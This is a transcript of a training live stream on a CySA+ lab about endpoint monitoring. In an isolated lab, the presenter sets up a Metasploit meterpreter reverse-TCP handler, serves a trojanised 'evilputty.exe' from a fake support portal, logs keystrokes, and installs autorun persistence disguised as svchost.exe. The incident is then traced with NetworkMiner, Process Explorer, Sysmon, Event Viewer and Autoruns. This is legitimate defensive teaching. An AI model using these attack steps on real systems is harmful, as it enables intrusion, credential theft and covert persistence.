Welcome to today's live stream. Today we're going to be going through CySA Plus Lab 4. This one's going to be on endpoint security monitoring tools. Again, if you have any questions as we go through this, please leave a comment or email info@cyberkrafttraining.com. I'll be happy to answer you. Let's go ahead and get started. We're not going to be using any commercial endpoint tools. We're going to be using everything that's included with Windows. So you're going to learn, even if you don't have anything available to you on the job, you should be able to monitor and analyze these tools. So let's go ahead and get started here. Okay, so for this objective, for this lab, we're covering these objectives: analyzing data as part of security monitoring, implement configuration changes, and given an incident, analyze potential indicators of a compromise, 3.1, 3.2, and 4.3. So a lot of domain 3 and 4 here. Now, the scenario as it says here, we can't always depend on antivirus software to detect advanced persistent threats. It says that advanced persistent threats is a type of malware. That's not really true. Advanced persistent threat is usually a group or a entity that produces viruses, like a threat group. And we're not going to be using EDR, endpoint detection and response, or user entity behavior analytics, UEBA solutions. Instead, we're going to be using the tools included in Windows. Gives us a lab topology here, which I don't think is very applicable to this lab. I mean, it just shows us we have a Kali box connected. We have MS1 and DC1 and a Windows 10 machine. That's pretty straightforward. I think it's the same scenario we have with most of the labs here. Okay. So we're going to simulate an attack using a Trojan created by injecting code for a meterpreter reverse shell into a legitimate executable. Okay, so this is a pretty common attack method. It takes advantage of the fact that outbound security controls are usually not as robust as inbound security controls. So what's going to happen is we're going to set up a reverse shell, I believe. Yeah, we're going to set up a reverse shell where the machine is going to open up a connection to the attacker's machine, or the handler, as it's known. So the exploited machine will open up a connection to its handler. Right. Okay, and we're going to use Metasploitable for this, or Metasploit. Metasploit framework is included with Kali Linux. So we have PT1, we have a Kali machine. Oh no, this one's an older one. Older versions of Kali. The username was always root. And the password's going to be that same password. PA $$W0RD. Okay, we're going to open up a terminal. And we're going to start an Apache server. So service Apache 2 start, Firefox, HTTP, localhost. It's going to open up a Firefox window. And this is our user portal. This is what we have here. This is the Fictionary portal that we have as part of our lab scenario. This is basically, we're mimicking a IT support portal that would be used within a corporation. So imagine that the attackers are creating this website to look very similar to a real support portal used by the company to trick employees into accessing or putting credentials into this site. Okay. Now we're going to run Metasploitable. We can close this out. Command's going to be run space MSF or run MSF console. Oh yeah. Make sure to do this in the Let's give it a moment. Let me make sure I'm writing this correctly here. No, that's started. Of all the labs, I gotta say the CySA Plus labs have the most problems. Let's try opening up Metasploit in a different way. Okay, so all I've done is I've just gone to the top left, I've clicked the drop down, and I found Metasploit. You can find it here, or you can type in the search bar Meta, and you'll find Metasploit Framework. And I started it that way. I think we had to use super user do privileges. It doesn't say to do that. All right, so now we have our Metasploit Framework working. Our Apache service is running, so that's fine. So now we have our Metasploit Framework. And this has come up. So this is going to load. Metasploit Framework is going to give us a number of exploits that we can use with our attack. So we can pick and choose. It's basically a database of exploits. Okay. It says not to worry about the connection to the database. Database appears to be already configured. Now that's different from what it says is going to happen. All right. So now we have MSF5, which is the terminal that we want. We're going to say use exploit / multi / handler. All right. Now we're using this exploit multi handler, and then we're going to set a payload for it. So we're creating an exploit essentially. Okay. So we already have that. If you enter the first part correctly, you're going to see this next part saying exploit multi-handler. And we're going to set space payload Windows, because we're targeting a Windows machine. We're going to say meterpreter / reverse _ TCP. Okay. Now we're setting up that meterpreter that with that targeting a Windows machine. If we were targeting a Mac machine, we would specify Mac or Linux or whatever we wanted. I'm going to set the local host, set space lhost space 192.168.2.192, and then set the local port 3389. And then finally, we could finish it out by hitting exploit. Okay, great. Now it started a reverse TCP handler on 192.168.2.192 with that port 3389. So we've established this listener. All right, now we're ready for the Windows machine to make a connection back into this machine. Okay, and the prompt is correct. Okay. Again, this is the IP address of the virtual machine here. So that's what we're looking for. We have that listener set up, so now we're ready for the Windows machine to connect back here. Okay. Now we're going to be using 3389, which is for RDP. Okay. Now we're setting that as RDP because we're hoping that the RDP port is open for outbound connections on the target device. So we purposely want it to be RDP or a common protocol. All right. So now we're going to go over, we're going to go back to PC1 now. And we're going to use packet analysis software. Okay, we're going to extract some different files from that, and then we're going to analyze those files to see what we'll be transmitting over the network. So it says packet analysis software can extract binary files transmitted using a network protocol. This technique can be used to perform wire speed antivirus scanning. All right. So we've logged on. We're going to go to lab files, and we're going to netminer. Make sure to right click and run as administrator. It's going to take a moment to load. It is trying to run. Let me close out in ZenMap. I was just messing around with ZenMap before the lab started. Okay, and what we're going to be doing here is we're going to be setting up a packet capture. So we're going to be using WinPCAP. And then we're going to navigate to a specific URL. Now this URL should look familiar. Again, this is running. I know these virtual machines are slow. Believe me, it is trying to load. And basically what we're going to be doing here, I believe, as part of the next steps, is we're going to be establishing some sort of phishing attack and then tricking the user of the machine, the PC1, to click on a certain file, malicious file. And then that's going to open up that interpreter session, open up that shell session, a reverse shell, to our Kali Linux machine. Okay, this really is taking a while. Let's see. Just going to take a look at Task Manager and see if... Oh yeah, it's just slow. There it goes. Okay. So we have Network Miner running. A little slower than normal. We're going to select the network adapter, and we're going to pick here WinPCAP from WinPCAP Microsoft Corporation. There's two of them listed here. We're going to pick the second one. Okay. And then we're going to go ahead and click Start. We're not going to change any of the other settings. So we're basically capturing packets. We could use a tool like Wireshark if we wanted to, but we're using something a little different here. Now on this one, it's a little lazy. We could definitely have some sort of malicious payload that's part of the lab. It says, we'll imagine that something has induced the user to visit the phishing page, which, you know, we could have some more creative solutions for that. And we can have a phishing email. We can open up our Thunderbird client, you know. In fact, we can even do that now. I wonder what this email address is. And administrator@515support.com. So we can simulate that. Let's go ahead and simulate that because I think that's pretty lazy, I gotta say. Just imagining that there's a scenario. Oh, we're gonna have to do... Let's send it from DC1. Hopefully the email client's configured here. Or we have an email client. Do we have Outlook? No. Okay. So I guess we are going to have to imagine this. Otherwise it's going to take us... I don't want to waste time configuring these emails here. But imagine this email, this account got an email with a phishing email. And the user was tricked into typing in or to opening up this URL. Okay. So we're going to go ahead and navigate to that website. And that's the support panel that we started. Remember, we're hosting this on our Kali Linux machine. Okay. And we're going to go ahead and try, okay, this says important update, all employees should download and run the connection tool to enable IT support, perform a system integrity check. Okay, so we're going to go ahead and click the connection tool. And we're going to go ahead and run this file called evilputty.exe. Okay. Let's go ahead. Well, it says asks us for us to save it, so let's just save it. And then we'll go ahead and open up our downloads here. Just have that ready. Okay. Now we're going to go ahead and stop our network miner. Stop. Let's go to the host tabs, which is already open. Now the host tab is going to show active and inactive hosts. Some of the hosts are going to be shown in the local machine's ARP cache, but not active on the network. So we see these different machines that are on the or in the ARP cache from this local machine. And from here we can look at different types of files, different connections, basically like a history, what's happened as we've captured these packets. And we can look at files here, and we'll see that evilputty.exe because we downloaded that file from the support site. So Network Miner can be useful to download or to discover what files have been downloaded, what connections have been made. It's a very useful tool for that. I mean, we can use something like Wireshark as well, but this is just another tool to throw in your toolbox. So, maybe Wireshark's not available to you. Now we can also see the website, index.html. It's going to be the website. Remember, websites are just a collection of files, essentially. We see that evilputty. Now from here, from the network mining tool, we can go ahead and calculate a hash. So let's go ahead and calculate a hash. And it's going to give us a hash MD5, a SHA-1, a SHA-256, all of those hashes. Remember, secure hashing algorithm 1, secure hashing algorithm 256. We get the hash values for each of those. Now we can use these hash files to check whether the binary is of any known malware files. So there's known malware, and you could check what malware has been identified by the security community as being malware by analyzing the binary here. Okay. So it's essentially a form of signature that we can use for the malware. So if you're dealing with a Trojan where a malware has been installed as part of another program, this might be able to help you. All right, so let's go ahead and let's see. It also gives you the path here, the size of the file, and when it was written to the disk. So useful information whenever we look at the files from Network Miner. I think that's the extent of what we're doing with Network Miner today. But as you can see, there's lots of other things you can. Let me just go through some of the other things here. You can find images. Here's the images we downloaded. This one's is part of the website. Remember, we have this image as part of the website. If there's any messages from messaging utilities, credentials. Here we have credentials from IMAP. Okay. I think that's because I opened up Thunderbird. Any sessions that we've established. We have IMAP, a NetBIOS service, and then 80 for our HTTP connections. Okay. 143 for IMAP. I think it's because I opened up Thunderbird, which is, part of the reason why I opened up Thunderbird. And then we have all these different things we can look at through our packet capture. All right, so we're going to go ahead and close that. Here, what's this show us? Yeah, this shows us exactly what we just looked at, the evilputty.exe. Okay, so I hope that's helpful. Network Miner is a pretty useful tool. I invite you to become familiar with it. Play around with it outside the parameters of the lab. You have access to the lab. Work outside these labs, just the instructions. It's really going to help you learn the material a little better than just following the steps. You're not going to break anything, and if you do, you can just reset the lab. All right, for the next part, we're going to use Process Explorer and Process Monitoring tools. These can be used for live monitoring, but practice live monitoring is only useful in sandbox environments where you know something bad is about to happen. Sysmon allows logging of events that match a given configuration profile. This exercise, we're going to use a Sysmon configuration profile developed by a security professional. Okay, so we're going to open up PowerShell or Command Prompt, whatever you want. I'm going to go ahead and open up PowerShell. I'm going to run as administrator. Make sure you run as administrator, whatever you use. And we're going to use these commands to install this file. Okay. Okay, that was correct, and it's working. All right, so that worked successfully. All right, so now we're going to lab files, sysinternal, and we're going to run process XP64 or Process Explorer 64. We're going to agree that. Now, sysinternals, this is owned by Microsoft. These are tools that you can use freely if you have a Windows machine. And they include a lot of different security tools, a lot of different useful diagnostic tools for Windows devices. All right, so now we've opened up Process Explorer. And now we see Process Explorer. If you look at it for the first time, you haven't looked at this before, it can be a little overwhelming. So let's just take a moment to break this down. What do we see here? You know, we see a lot of different colors. We see different processes. We see, let's see, all these working in colored codes, number of CPU usage here. We have a couple different graphs here. The CPU usage, system commit, physical memory, input, output. And as we scroll down here, we're going to see all of the different processes that we have. Okay, you're going to see a lot of service hosts or SVC hosts. Network miner, PowerShell, these different programs that we have running right now. Okay. Now, it's asking us, the lab is asking us to adjust the view to show the name and integrity level columns. So let's go ahead and try and do that. So to do this, we're going to have to hit View and then go down to Select Columns. And we're going to have to enable username and integrity level. So let's take a look. Process. We have process name. We need username. I'm missing this one here. Let's see. There it is. Integrity level. Now, where's user name? There it is. Okay. It could be a little difficult to find these. These are going to be found in process image. So you want to check these two, integrity level and username. Doesn't say that in these labs, and this is why I like doing these CySA Plus labs with you guys, because otherwise, how are you going to know how to do this? You could get stumped on this step, and a lot of people do. All right, so now we have username and integrity right here. So we see the username, who's accessed each of these processes. We can expand that out. Most of these are going to be 515 support administrator. And then we have the integrity level there. And again, we can sort with any of these columns. So we can sort by integrity level if we like, by the process, whatever we like. If we sort by process, we're going to do it in alphabetical order. If we do integrity level, we can do integrity low to high or high to low, however we like. Okay, so now we have those sorted. I'm just going to sort again by process, or yeah, that should be fine. All right, now let's see what we have in place. All right, so now we have the monitoring. We have Process Explorer. We're going to go to the browser. With the monitoring tools in place, the next step is to run the malware and identify indicators of anomalous behavior. Okay, so now we're going to go ahead and it says click the run button. If you don't know what this means, what they're asking you to do is to open up that download that we had before and then to run Evil Putty. So we're going to run Evil Putty. Now, that's okay. We're going to hit run. If a user comes up with this pop-up, they're probably going to be a little suspicious, hopefully, if your training's good. So we're going to go ahead and run that. We have Evil Putty running now in the background. Now we're going to go ahead to PT1, and you can see we've started a reverse TCP handler. One session open. So now we've established that session. The machine has connected back to us. Now, if you're an attacker and you see this message, that's really good for you because now you can do all sorts of things. You have a shell connection back to that machine. So there's all sorts of things we can do once we've established this interpreter connection. Okay. Now we can have, there's some fun commands. Let's see. Let's just do some, if I remember these correctly. Yeah. So we can do IP config. We can take a look at the network connections here. Microsoft Hyper-V network adapter number 2. So we're seeing the network interfaces in use by the Windows machines. What are some good ones? There's some fun ones you can do here. Oh yeah. Get user ID. We could get the user ID. I'm looking through some top 10s. I've used this I've used this technique myself, running live exercises with like team building exercises, where we have a group of security professionals running against live injects. So they could be pretty fun to, if you're on the red team playing around with this. So, and then let's see here another one. Like we can do sysinfo. Oh, we could do key logging. Yeah, that's a creepy one. do you do key logging again? Let me see how to do this real quick. Yeah, I think it's key scan start. Key scan start. No. Or is it key scan underscore start? Yeah. Okay, so now we've started a keystroke sniffer. Now with a keystroke sniffer, we can see everything that the PC is doing. So now we open up a Word document or something, a WordPad, you know, let's see, brown or the red fox jumps over the lazy dog. All right, so we're just typing something. We're typing an email. We're typing a document. We go back to our interpreter session. And now we should be able to see that. I think, let me figure out how to show the outputs. I think it's key scan dump. Let's try that. It's key scan dump. Yep. Dumping captured keystrokes. The brown, and I deleted brown. The red fox jumps over the lazy dog. So now we've seen everything that the user's typing. So, you know, establishing a connection like this can be incredibly harmful. And then you can do passwords. You can capture all sorts of information. Okay. Yeah, we can do geolocation. Yeah, we can take screenshots. We can access the camera at some instances. So, yeah, there's lots of stuff we can do. Okay, so yeah, we've checked the terminal output here. We're able to establish a connection. And let's go back to PC1, take a look at Process Explorer. Now we should be able to find evilputty.exe on here. So I'm just going to sort this alphabetically. evilputty.exe. Okay. Now something should stick out at you already. SSH Telnet and our remote login client. That's kind of a concern right there. Now, because this was running as part of the browser rather than from Explorer, from Microsoft Explorer, it's running as a child of the browser broker container. So if we take a look, we can't really see that from how I sorted this. Let's take a look at properties here. Okay. All right, we want to take a look at its PID. Okay, let's see, where's the PID? 2896. So let's take note of that, 2896. Now this is running at a medium integrity level. We didn't run this as an administrator. Now it says here that processes executed as administrator of a high integrity level. Processes that are not showing any integrity level are running with system privileges. Okay, so we see some of these that are running as system privileges. Like service host, a lot of the instances are running. Well, actually, those are access denied. Let's see. Anything with access denied is going to show no privileges. Don't really have any examples of that. Process Explorer cannot show details for those processes because it only has medium level privileges. So yeah, so a lot of these service hosts, access denied, we don't see an integrity level because Process Explorer doesn't have the permissions to evaluate that. Now, service host is going to be used for Microsoft services. So you have all different, lots of malware masquerades as service host.exe. All right, so let's go to Evil Putty. Oh, no, actually, within Process Explorer, we want to go to Evil Putty, right-click and go to Properties. We already did this, but let's do it again. Right-click, Properties, go to TCP/IP, okay? And here we see the remote address. Establish a connection with this remote address, okay? We see that we've established a remote connection with 192.168.2.192, which is the Kali Linux machine. So, and that the state is established right now. Now we can use this with other network monitoring tools. This would come up as well, but this is just a way of using Process Explorer to find that connection. All right, so we can go ahead and close this out, I think. Let's just keep it up, though. I'm not sure if the lab's going to want us to have it on here. Okay, so if the initial execution is not blocked by security software, the attacker will be able to start trying to achieve actions on objectives or do further exploits. Maybe download files, install a backdoor, anything like that. So one common objective is to obtain persistence on the compromised host so that the attacker can reconnect even if the user logs off. Now, establishing a persistence usually involves installing some sort of backdoor. This requires the attacker to interact with the host system, creating a discoverable trail of audit logs if security logging is configured. Analyzing audit logs is a great way to reconstruct an incident after the fact. You can also use tools like Splunk to generate alerts in real time based off of audit logs. It can be very helpful. Okay, we're going to take a look at the current time, 11:06 a.m. We're going to switch to our Kali machine. In our interpreter prompt, we're going to run the following commands. We're going to run background. Okay. Now what this is going to do is it's going to put this session in background. We're going to say use post/windows/manage/persistence_exe. All right, that worked correctly. Windows Manage Persistence exe. We're going to do show space options. Now we have different options, module options. We didn't need to do that essentially because we know these. Set rexe name to svc host.exe. So we're renaming the process, okay? And we're going to set the executable path to root/downloads/evilputty.exe. So we're renaming the process service host.exe, and we're telling the process to point towards the file that's in the downloads folder. Set startup user, set session 1. Make sure to type user in all caps, and then exploit. Okay, I think that worked correctly. I don't see any misspellings. Running module, reading the payload, executing the script, installing into auto run, which is when we set startup. It's going to auto run on startup. So yeah, I think we did that right. Okay, now what we're going to do is we're going to close all our windows here. Okay. We're going to restart our virtual machine. So basically, we're restarting the machine. We've closed the session. We've restarted the machine. The session is now closed. Now we're going to try and reestablish that session on the machine. Now, this time, the Windows machine is not connecting to us, right? The Windows machine's, well, the session is still going to be running in the background with Evil Putty, but let's see if we can reestablish connection here. Oh no, I restarted the I restarted PT1. I should have restarted PC1. That's okay. I think that might be okay. It should be. Let's see. I think we have to redo all of our commands here. Let's see. That was kind of a mistake on my part. I restarted the wrong machine. Essentially, what I have to do now is I'm going to have to reestablish connections with, reset up the exploit on the penetration testing machine. But essentially what's going to happen if we restart PC1, Evil Putty is going to restart itself. So we're going to go ahead and restart. It's going to restart anyway. Let's see if we can save this. Set low support 3389. I think we have to do that at the beginning. But I don't think we need to have that for the next part of the lab here. Yeah, we don't. Okay. So that's not a big deal. Essentially what we're doing here, we're restarting PC1. Once we restart, we're going to open it back up, and then we're going to look at Windows Event Viewer. So the last part of the lab is with Windows Event Viewer. So if you did what I did, don't worry. But we can easily reestablish that connection. We can use the same exploit, just go through the steps again. I don't want to do that. I don't want to waste anybody's time here. But what we're going to do is we're going to start PC1, and we're going to open up Windows Event Viewer, and we're going to view the files. Now, Evil Putty should pop up here. It should pop up on startup. We're not being incredibly stealthy or putting in the background in any way. So we're just having it start, and there it pops up. Now this is designed to be basically, this is in the background establishing that connection to the Kali Linux machine. All right, now let's go to Event Viewer. I'm going to run as administrator. We're going to expand applications and service logs. Expand Microsoft, expand Windows, go down to sysmon, expand that, and then look at operational. Okay. Now we're going to take a look at the time here. Let's see. The time we did that, we just logged on, so. Trying to find the evil putty executable. PID is 2896. I'm looking here. If you've never used this event viewer before, it'd be really useful for finding different security events, different logs within your Windows machine. You don't need any special hardware to use. Now, tools like Splunk will pull this log information, and take a look. Provide you more detail, more graphical interface. Okay, here we go. I think that could just be a regular service host. Remember, we hid this as a service host file. It can take a moment to find this stuff. I'm looking here for the evilputty.exe. You see all these other processes that start on your startup, like OneDrive. That could be this one here. Remember, we hid that as, let's see what it's going to look at. App data local temp or service host.exe. So I think that's the one we're looking for. I think we found it. App data local temp service host.exe. So I think this is evil putty showing up there. Now let's take a look back at 1106 and see when we It's asking us to scroll to the logs at the time you noted, 11:06 a.m., note sequence offense, file create evilputty.exe creates the S service host file in a temp folder. Then we have a process created. Service host is loaded as a process, registry value set. So let's see if we can find some of that. Process created, rule process created. Not quite seeing that at 11:06. Let's take a look at 11:08. Here we go. Okay, downloads evilputty.exe at 11:08. Registry value set. Okay, so we have that. Got that, and then let's find when the process was terminated. Process terminated. Servicehost.exe. Okay, so great. So we have the process terminated. We have registry value set and process terminated, and creating servicehost.exe. Where was that? This one? Yeah, so it could be tricky to look through these files. Again, this is very intensive. You've seen how long it takes us just to look through these files. This is why you have something like a SIM, something like Splunk, to look through these files and show you a graphical explanation. All right, but we did track the malware activity. So if we were trying to reconstruct an attack and how it happened, we could look through these files and then do that as part of the later part of our incident response process. Okay, now let's look up the temp folder. Looking at our temp folder, we have service host. Now, this is application, has the same icon as Evil Putty. Okay. If we wanted to cover our tracks, we can delete this artifact or hide this a little better. Now, this is not a very sophisticated attack that we've executed, but it has been fairly effective. We did establish that connection. Now we're going to go ahead and run autorun64.exe. Go to sysinternals, autorun64. Agree to the terms. This is going to show us everything that's meant to run on startup or automatically run. And we're going to find the malware's entry here. Let's try and find it here. Let's try sorting by logon. Here we go. As servicehost.exe. Then we can right click that and delete the entry. So we're going to prevent this program from auto running on startup. Again, these labs could explain this a little better. It's asking you just to search through everything. It could explain that you can look, sort by the logon. We can even sort. There's a couple different ways to sort this. It's not really very explanative. A lot of these CySA Plus labs are not. They just tell you very limited information, try and get you to figure it out on your own. I think it leans a little more towards just leaving you out, hanging out to dry a lot of times. Okay. So that concludes the lab. I hope this was helpful. I hope you guys were able to learn and follow along. We did a few extra things outside the scope of the lab, and I do invite you to try that on your own. So again, if you have any questions, email info@cyberkrafttraining.com or leave a comment. And if you're looking for CySA Plus training, we have self-paced and instructor-led courses at cyberkrafttraining.com. We have some links in the description if you want. Check them out. You'll save a couple $100 off your enrollment if you use our discount code YouTube in the description on either our instructor-led boot camps. So if you're looking for instructor-led training, we have a class coming up next week. Really great class. You're going to get your CySA Plus guaranteed. If you don't get it, we'll pay for your second exam voucher. So everybody gets it after 2 voucher attempts. At least within 2022, we had 100% success rate with our CySA Plus students. So if you're looking to get your CySA Plus kickoff 2023 in the right way, go ahead and check those out. But if you have any questions, let me know in the description. And I appreciate your time. Thanks for joining.